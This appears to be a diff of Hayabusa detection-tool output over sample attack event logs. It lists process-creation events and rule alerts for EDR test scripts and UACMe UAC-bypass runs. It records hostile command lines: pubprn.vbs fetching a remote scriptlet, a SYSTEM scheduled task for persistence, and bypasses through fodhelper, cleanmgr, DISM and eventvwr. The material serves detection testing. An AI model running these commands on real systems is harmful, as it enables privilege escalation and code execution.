+2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe  :  Path: C:\Windows\System32\forfiles.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe""  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: forfiles  /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c winrm qc -q   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript  //nologo ""C:\Windows\System32\winrm.vbs"" qc -q  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c winrm qc -q ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:35.878 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript  //nologo ""C:\Windows\System32\winrm.vbs"" i c wmicimv2/Win32_Process @{CommandLine=""calc""}  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: calc  :  Path: C:\Windows\System32\calc.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:36.534 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.261 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.385 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Suspicious Calculator Usage,,rules/sigma/process_creation/win_susp_calc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:40.889 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: schtasks  /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c schtasks /create /tn ""mysc"" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru ""System"" /f",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.242 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.311 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout  5  :  Path: C:\Windows\System32\timeout.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-07-30 06:34:45.606 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript  /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct  :  Path: C:\Windows\System32\cscript.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd  /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  34  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.209 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:48.924 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management  :  Command: ""C:\Windows\System32\schtasks.exe"" /run /tn ""\Microsoft\Windows\DiskCleanup\SilentCleanup"" /i  :  Path: C:\Windows\System32\schtasks.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  34",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""\system32\cleanmgr.exe /autoclean /d C:  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 18:46:49.402 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using Disk Cleanup,,rules/sigma/process_creation/win_uac_bypass_cleanmgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_34.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  33  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.589 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.929 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:02.934 +09:00,MSEDGEWIN10,13,high,Shell Open Registry Keys Manipulation,,rules/sigma/registry_event/win_registry_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe""   :  Path: C:\Windows\System32\fodhelper.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:07.665 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 324 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\fodhelper.exe""   :  Path: C:\Windows\System32\fodhelper.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  33",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\fodhelper.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.472 +09:00,MSEDGEWIN10,1,high,Bypass UAC via Fodhelper.exe,,rules/sigma/process_creation/win_uac_fodhelper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:14:08.681 +09:00,MSEDGEWIN10,12,medium,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_event/sysmon_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_33.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  32  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.511 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.647 +09:00,MSEDGEWIN10,11,high,UAC Bypass Using Windows Media Player - File,,rules/sigma/file_event/file_event_uac_bypass_wmp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:46.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064421EA0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:47.219 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064425400  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.431 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\windows\system32\cmd.exe ""C:\Program Files\Windows Media Player\osk.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.675 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:48.696 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 318 0000028064425400  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 19:51:49.371 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  32",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_32.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  30  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.364 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:15.579 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 0000028064427C00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.433 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe""   :  Path: C:\Windows\SysWOW64\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:17.541 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 294 0000028064427C00  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\syswow64\wusa.exe""   :  Path: C:\Windows\SysWOW64\wusa.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  30",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.694 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 6312 -ip 6312",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.715 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\SysWOW64\WerFault.exe -u -p 6312 -s 80  :  Path: C:\Windows\SysWOW64\WerFault.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\syswow64\wusa.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 20:23:18.824 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4348 -ip 4348",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_30.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  23  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.680 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:53.943 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BCAF0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.900 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml  :  Path: C:\Windows\System32\PkgMgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:54.972 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 406 000002806444C740  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.455 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml  :  Path: C:\Windows\System32\PkgMgr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  23",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""  :  Path: C:\Windows\System32\Dism.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\pkgmgr.exe"" /n:C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.620 +09:00,MSEDGEWIN10,1,high,UAC Bypass Using PkgMgr and DISM,,rules/sigma/process_creation/win_uac_bypass_pkgmgr_dism.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:06:55.820 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\dism.exe"" /online /norestart /apply-unattend:""C:\Users\IEUser\AppData\Local\Temp\oemsetup.xml""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_23.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: UACME.exe  22  :  Path: C:\Users\IEUser\Desktop\UACME.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.636 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:13.874 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC3D0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC9C0  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:14.977 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC890  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:15.664 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 896 272 00000280644BC170  :  Path: C:\Windows\System32\consent.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
+2019-08-03 21:08:16.721 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: UACME.exe  22",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_22.evtx
